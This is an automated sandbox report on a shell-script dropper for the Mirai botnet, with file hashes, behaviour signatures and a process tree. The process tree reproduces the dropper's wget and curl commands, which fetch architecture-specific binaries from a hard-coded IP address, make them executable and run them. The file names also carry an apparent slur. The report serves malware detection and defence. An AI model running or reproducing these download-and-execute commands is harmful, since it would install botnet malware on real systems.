Overview

overview

10

Static

static

1

jewn.sh

ubuntu-18.04-amd64

10

jewn.sh

debian-9-armhf

10

jewn.sh

debian-9-mips

10

jewn.sh

debian-9-mipsel

10

Analysis

  • max time kernel
    48s
  • max time network
    152s
  • platform
    ubuntu-18.04_amd64
  • resource
    ubuntu1804-amd64-20240611-en
  • resource tags

    arch:amd64arch:i386image:ubuntu1804-amd64-20240611-enkernel:4.15.0-213-genericlocale:en-usos:ubuntu-18.04-amd64system
  • submitted
    06/12/2024, 13:19

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    jewn.sh

  • Size

    1KB

  • MD5

    49377a7c5220a2e428c4ff6898fcd50c

  • SHA1

    0d2843613a97cc150c539474b2db2ff741260997

  • SHA256

    336fc216d10d88ac069d22db53159229050040ff570e610ddcca11040e666a4c

  • SHA512

    51189375074dc361c0b855ae89774e7888a0a3360bd8291f2d99ba2bc8de4cdf8a2307044d8aee9d9459973f2e29b5d866b7b004e7df754688324a207d77b342

Score
10/10
miraikurcbotnetdefense_evasiondiscovery

Malware Config

Extracted

Family

mirai

Botnet

KURC

Signatures

  • Mirai

    Mirai is a prevalent Linux malware infecting exposed network devices.

    botnetmirai
  • Mirai family
    mirai
  • Contacts a large (112638) amount of remote hosts 1 TTPs

    This may indicate a network scan to discover remotely running services.

    discovery
  • Creates a large amount of network flows 1 TTPs

    This may indicate a network scan to discover remotely running services.

    discovery
  • File and Directory Permissions Modification 1 TTPs 5 IoCs

    Adversaries may modify file or directory permissions to evade defenses.

    defense_evasion
  • Executes dropped EXE 5 IoCs
  • Modifies Watchdog functionality 1 TTPs 10 IoCs

    Malware like Mirai modifies the Watchdog to prevent it restarting an infected system.

    defense_evasion
  • Enumerates active TCP sockets 1 TTPs 4 IoCs

    Gets active TCP sockets from /proc virtual filesystem.

    discovery
  • Enumerates running processes

    Discovers information about currently running processes on the system

  • Writes file to system bin folder 10 IoCs
  • Changes its process name 5 IoCs
  • Reads system network configuration 1 TTPs 4 IoCs

    Uses contents of /proc filesystem to enumerate network settings.

    discovery
  • Reads runtime system information 64 IoCs

    Reads data from /proc virtual filesystem.

    discovery
  • System Network Configuration Discovery 1 TTPs 2 IoCs

    Adversaries may gather information about the network configuration of a system.

    discovery
  • Writes file to tmp directory 10 IoCs

    Malware often drops required files in the /tmp directory.

Processes

  • /tmp/jewn.sh
    /tmp/jewn.sh
    1⤵
    • Writes file to tmp directory
    PID:1498
    • /usr/bin/wget
      wget http://93.123.85.78/bins/jew.x86
      2⤵
      • Writes file to tmp directory
      PID:1499
    • /usr/bin/curl
      curl -O http://93.123.85.78/bins/jew.x86
      2⤵
      • Writes file to tmp directory
      PID:1503
    • /bin/cat
      cat jew.x86
      2⤵
        PID:1504
      • /bin/chmod
        chmod +x config-err-WSc3G3 jewn jewn.sh jew.x86 netplan_sl6cks9p snap-private-tmp ssh-hlYRIaBlcMzr systemd-private-aff032fe4301446191c7feed4a3fb51f-bolt.service-GFuQdq systemd-private-aff032fe4301446191c7feed4a3fb51f-colord.service-gjAwvo systemd-private-aff032fe4301446191c7feed4a3fb51f-ModemManager.service-0OKl5o systemd-private-aff032fe4301446191c7feed4a3fb51f-systemd-resolved.service-qc2DKP systemd-private-aff032fe4301446191c7feed4a3fb51f-systemd-timedated.service-Sr34mS
        2⤵
        • File and Directory Permissions Modification
        PID:1505
      • /tmp/jewn
        ./jewn
        2⤵
        • Executes dropped EXE
        • Modifies Watchdog functionality
        • Writes file to system bin folder
        • Changes its process name
        PID:1506
      • /usr/bin/wget
        wget http://93.123.85.78/bins/jew.mips
        2⤵
        • System Network Configuration Discovery
        • Writes file to tmp directory
        PID:1509
      • /usr/bin/curl
        curl -O http://93.123.85.78/bins/jew.mips
        2⤵
        • System Network Configuration Discovery
        • Writes file to tmp directory
        PID:1514
      • /bin/chmod
        chmod +x config-err-WSc3G3 jew.mips jewn jewn.sh jew.x86 netplan_sl6cks9p snap-private-tmp ssh-hlYRIaBlcMzr systemd-private-aff032fe4301446191c7feed4a3fb51f-bolt.service-GFuQdq systemd-private-aff032fe4301446191c7feed4a3fb51f-colord.service-gjAwvo systemd-private-aff032fe4301446191c7feed4a3fb51f-ModemManager.service-0OKl5o systemd-private-aff032fe4301446191c7feed4a3fb51f-systemd-resolved.service-qc2DKP systemd-private-aff032fe4301446191c7feed4a3fb51f-systemd-timedated.service-Sr34mS
        2⤵
        • File and Directory Permissions Modification
        PID:1521
      • /tmp/jewn
        ./jewn
        2⤵
        • Executes dropped EXE
        • Modifies Watchdog functionality
        • Enumerates active TCP sockets
        • Writes file to system bin folder
        • Changes its process name
        • Reads system network configuration
        • Reads runtime system information
        PID:1522
      • /usr/bin/wget
        wget http://93.123.85.78/bins/jew.mpsl
        2⤵
        • Writes file to tmp directory
        PID:1525
      • /usr/bin/curl
        curl -O http://93.123.85.78/bins/jew.mpsl
        2⤵
        • Writes file to tmp directory
        PID:1528
      • /bin/chmod
        chmod +x config-err-WSc3G3 jew.mips jew.mpsl jewn jewn.sh jew.x86 netplan_sl6cks9p snap-private-tmp ssh-hlYRIaBlcMzr systemd-private-aff032fe4301446191c7feed4a3fb51f-bolt.service-GFuQdq systemd-private-aff032fe4301446191c7feed4a3fb51f-colord.service-gjAwvo systemd-private-aff032fe4301446191c7feed4a3fb51f-ModemManager.service-0OKl5o systemd-private-aff032fe4301446191c7feed4a3fb51f-systemd-resolved.service-qc2DKP systemd-private-aff032fe4301446191c7feed4a3fb51f-systemd-timedated.service-Sr34mS
        2⤵
        • File and Directory Permissions Modification
        PID:1530
      • /tmp/jewn
        ./jewn
        2⤵
        • Executes dropped EXE
        • Modifies Watchdog functionality
        • Enumerates active TCP sockets
        • Writes file to system bin folder
        • Changes its process name
        • Reads system network configuration
        • Reads runtime system information
        PID:1531
      • /usr/bin/wget
        wget http://93.123.85.78/bins/jew.arm4
        2⤵
          PID:1534
        • /usr/bin/curl
          curl -O http://93.123.85.78/bins/jew.arm4
          2⤵
          • Writes file to tmp directory
          PID:1537
        • /bin/chmod
          chmod +x config-err-WSc3G3 jew.arm4 jew.mips jew.mpsl jewn jewn.sh jew.x86 netplan_sl6cks9p snap-private-tmp ssh-hlYRIaBlcMzr systemd-private-aff032fe4301446191c7feed4a3fb51f-bolt.service-GFuQdq systemd-private-aff032fe4301446191c7feed4a3fb51f-colord.service-gjAwvo systemd-private-aff032fe4301446191c7feed4a3fb51f-ModemManager.service-0OKl5o systemd-private-aff032fe4301446191c7feed4a3fb51f-systemd-resolved.service-qc2DKP systemd-private-aff032fe4301446191c7feed4a3fb51f-systemd-timedated.service-Sr34mS
          2⤵
          • File and Directory Permissions Modification
          PID:1539
        • /tmp/jewn
          ./jewn
          2⤵
          • Executes dropped EXE
          • Modifies Watchdog functionality
          • Enumerates active TCP sockets
          • Writes file to system bin folder
          • Changes its process name
          • Reads system network configuration
          • Reads runtime system information
          PID:1540
        • /usr/bin/wget
          wget http://93.123.85.78/bins/jew.arm5
          2⤵
          • Writes file to tmp directory
          PID:1545
        • /usr/bin/curl
          curl -O http://93.123.85.78/bins/jew.arm5
          2⤵
          • Writes file to tmp directory
          PID:1548
        • /bin/chmod
          chmod +x config-err-WSc3G3 jew.arm4 jew.arm5 jew.mips jew.mpsl jewn jewn.sh jew.x86 netplan_sl6cks9p snap-private-tmp ssh-hlYRIaBlcMzr systemd-private-aff032fe4301446191c7feed4a3fb51f-bolt.service-GFuQdq systemd-private-aff032fe4301446191c7feed4a3fb51f-colord.service-gjAwvo systemd-private-aff032fe4301446191c7feed4a3fb51f-ModemManager.service-0OKl5o systemd-private-aff032fe4301446191c7feed4a3fb51f-systemd-resolved.service-qc2DKP
          2⤵
          • File and Directory Permissions Modification
          PID:1550
        • /tmp/jewn
          ./jewn
          2⤵
          • Executes dropped EXE
          • Modifies Watchdog functionality
          • Enumerates active TCP sockets
          • Writes file to system bin folder
          • Changes its process name
          • Reads system network configuration
          • Reads runtime system information
          PID:1551

      Network

      MITRE ATT&CK Enterprise v15

      Replay Monitor

      Loading Replay Monitor...

      Downloads

      • /tmp/jewn
        Filesize

        60KB

        MD5

        ec9bf54e29277d9028ea800cf3cf7501

        SHA1

        371485bf2f9f86e25e618fcb98071b3f6c8524a8

        SHA256

        19385e38460e0a288e81bdcbb75e7ad23f747d5163ba276ec996bc53db3a11d2

        SHA512

        87e2fd37cead67b3e43a9b18c0c43b702ba6ecee6d1de3be60d7bf778218c872b417a693205172a2c4ad368c9ffdfe5f7dcd6ff6a0868ad946dbe5cc9e727da9

        Download Submit